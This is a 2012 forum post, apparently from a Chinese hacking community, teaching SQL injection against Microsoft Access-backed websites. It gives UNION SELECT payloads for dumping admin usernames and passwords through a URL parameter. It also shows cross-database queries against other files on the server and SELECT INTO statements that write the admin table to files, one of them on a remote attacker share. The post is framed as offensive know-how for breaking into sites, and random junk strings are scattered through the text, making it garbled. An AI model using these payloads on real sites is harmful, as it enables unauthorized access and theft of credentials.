找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2078|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------  D. V3 {. w) Y% `
union查询法
9 a3 X% P" K. Y首先要说的就是查询办法,一般的查询办法就是
* x$ f  Q0 ^* F4 t
; o% P: a) v: h& l) F程序代码
9 C9 N& V" ?/ |( k: G" y, b9 w; Zand 1=(select count(*) from admin where left(id,1)='1')0 g" w% t* M. u2 ^

) i6 @+ P+ R7 Z2 X9 h0 u/ D这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
- \1 X3 X8 ?1 O6 I所以这个时候,union select横空出现.别以为只能在PHP里用哦...
( C: K6 A- w" _  d譬如你有一个ACCESS点:
2 C; ]9 v0 t* }( g程序代码* V& J# k4 t5 T4 K6 b. t
http://bbs.tian6.com/xiaoyang.asp?coder=1) a. B9 [) `+ c; n# u$ Y* D- Q) h
$ @8 V. _5 L- X' h4 a
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),+ I; K% T- j( N' w
然后我们直接来:
1 b  D7 g# @9 z3 C程序代码
5 Z# X0 Z$ B/ S/ N0 j$ v' D' Q6 shttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]2 R) f) A( t- X; Z9 p* `7 e
3 x5 J2 [7 }5 o2 S8 S( c- v/ {3 ?
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
- T! l; M/ y. |" a. {% s* G2 ~7 w0 h5 `% O" D

! l( \6 r( \4 n+ Y5 x- V) x! S2 N2 Q9 {$ [; _6 D  z
---------------------------------------------------------------
7 [! |! }# P: IAccess跨库查询
) i+ M8 ?; B- {# L有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.* f6 z; u1 n$ z& G9 V. i3 r# E
跨库的查询语句:
% n. A0 E1 |, U+ C子查询:& N" z' z- \4 g( G! S
程序代码. E2 ?" M1 Z. h- L$ Y+ S/ e8 M5 Q. M
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>04 R: }* [+ b8 D" G. F( |) Y! e
2 l; A( p/ T( F8 |
union查询:
" I+ ~6 y2 c0 Y8 g; _& s程序代码
( p( H' G0 z* H4 ^& ]6 J4 [union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
; S* B) ?9 l9 O8 O9 D
3 v& f, _' q' K- b+ R跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
! v+ R) V+ T( |( A& b( X程序代码$ D7 {% d% [) Q) o; ]
http://www.4ngel.net/article/46.htm + c/ N8 J  m1 d" b4 ~  _' ?
http://hf110.com/Article/hack/rqsl/200502/66.html
* J! X3 s8 v1 c2 f# y( _
1 n" P( M/ u1 a6 ~! ]' X9 r---------------------------------------------------------------& T9 ]$ V/ F7 b/ p
Access注入,导出txt,htm,html
+ B; @5 W" [0 b: {( o6 p) V子查询语句:
  A$ _- k( f$ Y. ~* q程序代码" n+ d8 s# {) s) j
Select * into [test.txt] in 'd:\web\' 'text;' from admin
1 q0 n5 O1 |; Y) I" G& C) T$ S
  ?% T( X  D9 D  L2 E8 C这样就把admin表的内容以test类型存进了d:\web里面.& I% `4 _  r* C1 j$ ~8 O( P, j
UNION查询:3 W  ^" f7 Q$ G0 N- D# R2 _  z
程序代码
+ V* G, s8 p# xunion select * into [admin.txt] in 'c:\' 'test;' from admin
7 m7 c* }/ r/ _; I$ j
: V( b$ p) V2 e! j9 I而且这里也可以保存到本地来:- {, S8 U; U8 ]: p
程序代码
& \& g; ?  {, r6 dSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
% R( b; t6 x  M& i* \0 [: I/ A; O5 l$ s( c2 Q. G) o/ X
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:/ R, B2 q! f# ]# W$ K- ?. E

) k7 ]' p# n4 b程序代码
/ P- x. [1 ~, f/ h  nhttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
$ ~, l4 o' I- T  c& V! Z
/ `* U) [) I7 c0 i9 x, a因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.
; y# N3 P7 H8 u% M* Z" L% f1 r9 x. ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表